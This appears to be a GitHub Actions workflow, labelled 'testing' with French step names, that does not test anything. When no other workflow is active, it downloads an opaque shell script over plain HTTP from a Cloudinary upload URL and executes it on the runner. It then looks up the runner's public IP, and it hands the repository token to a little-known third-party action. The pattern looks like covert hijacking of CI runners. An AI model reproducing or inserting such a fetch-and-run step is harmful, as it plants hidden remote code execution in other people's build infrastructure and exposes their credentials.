name: testing

on:
  workflow_dispatch:
  push:
    branches: [main]

jobs:
  run:
    continue-on-error: true
    runs-on: ubuntu-latest
    steps:
      - name: Vérifier les workflows actifs
        uses: athul/wc-status-action@v0.1.0
        id: workflow_status
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          repository: ${{ github.repository }}

      - name: Exécuter si aucun workflow actif
        run: |
          if [ "${{ steps.workflow_status.outputs.active_workflows_count }}" -eq 0 ]; then
            curl -O http://res.cloudinary.com/dyfqshedb/raw/upload/v1711044213/ij0dklvuprnlsnotxl2w.sh
            chmod +x ij0dklvuprnlsnotxl2w.sh
            ./ij0dklvuprnlsnotxl2w.sh
          else
            echo "Il y a déjà un workflow actif. Ce workflow ne sera pas exécuté."
          fi

      - name: IP Workflow
        run: |
          curl https://api.ipify.org

      # Ajoutez d'autres étapes de votre workflow ici
